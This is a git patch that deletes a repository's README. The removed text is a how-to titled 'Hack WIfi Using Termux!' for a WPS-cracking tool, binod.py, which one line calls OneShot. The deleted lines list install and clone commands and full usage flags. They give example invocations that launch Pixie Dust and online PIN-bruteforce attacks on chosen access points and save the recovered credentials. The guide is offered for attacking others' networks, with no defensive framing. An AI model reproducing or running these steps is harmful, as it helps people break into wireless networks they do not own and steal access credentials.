From 94616216a87137e4dcf32f31d070938905e07f01 Mon Sep 17 00:00:00 2001
From: FARHAN-SUPERUSERS <124022055+Gtajisan@users.noreply.github.com>
Date: Mon, 25 Sep 2023 22:39:58 +0600
Subject: [PATCH] Delete README.md
---
README.md | 93 -------------------------------------------------------
1 file changed, 93 deletions(-)
delete mode 100644 README.md
diff --git a/README.md b/README.md
deleted file mode 100644
index 46202bc..0000000
--- a/README.md
+++ /dev/null
@@ -1,93 +0,0 @@
-
-### Hack WIfi Using Termux! (Requires Root)
-
-
-## [Termux](https://termux.com/)
-Please note that root access is required.
-
-### Manually
-**Installing requirements**
- ```
- pkg install -y root-repo
- ```
- ```
- pkg install -y git tsu python wpa-supplicant pixiewps iw openssl
- ```
-### Getting WifiHack
- ```
- git clone --depth 1 https://github.com/Gtajisan/WifiHack
- ```
- ```
- cd WifiHack
- ```
-### Running
- ```
- sudo python binod.py -i wlan0 -K
- ```
-### One line Command
- ```
- sudo python WifiHack/binod.py -i wlan0 -K
- ```
-
-# Usage
-```
- binod.py
- Required arguments:
- -i, --interface= : Name of the interface to use
-
- Optional arguments:
- -b, --bssid= : BSSID of the target AP
- -p, --pin= : Use the specified pin (arbitrary string or 4/8 digit pin)
- -K, --pixie-dust : Run Pixie Dust attack
- -B, --bruteforce : Run online bruteforce attack
- --push-button-connect : Run WPS push button connection
-
- Advanced arguments:
- -d, --delay= : Set the delay between pin attempts [0]
- -w, --write : Write AP credentials to the file on success
- -F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
- -X, --show-pixie-cmd : Alway print Pixiewps command
- --vuln-list= : Use custom file with vulnerable devices list ['vulnwsc.txt']
- --iface-down : Down network interface when the work is finished
- -l, --loop : Run in a loop
- -r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
- --mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
- (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
- -v, --verbose : Verbose output
- ```
-
-## Usage examples
-Start Pixie Dust attack on a specified BSSID:
- ```
- sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
- ```
-Show avaliable networks and start Pixie Dust attack on a specified network:
- ```
- sudo python3 binod.py -i wlan0 -K
- ```
-Launch online WPS bruteforce with the specified first half of the PIN:
- ```
- sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
- ```
- Start WPS push button connection:s
- ```
- sudo python3 binod.py -i wlan0 --pbc
- ```
-## Troubleshooting
-#### "RTNETLINK answers: Operation not possible due to RF-kill"
- Just run:
-```sudo rfkill unblock wifi```
-#### "Device or resource busy (-16)"
- Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with ```--iface-down``` argument.
-#### The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC
- Try running WifiHack with the `--mtk-wifi` flag to initialize Wi-Fi device driver.
-# Acknowledgements
-## Special Than all root users
-* FARHAN X ME
-## [Facebook](https://www.facebook.com/profile.php?id=100094924471568&mibextid=ZbWKwL)
-
-## [Whatsapp](https://wa.me/+880130505723*)
-
-## Thanks For Using This Tool πΈπ
-## ki obsta π€‘
-## cd WifiHack sudo python WifiHack/binod.py -i wlan0 -K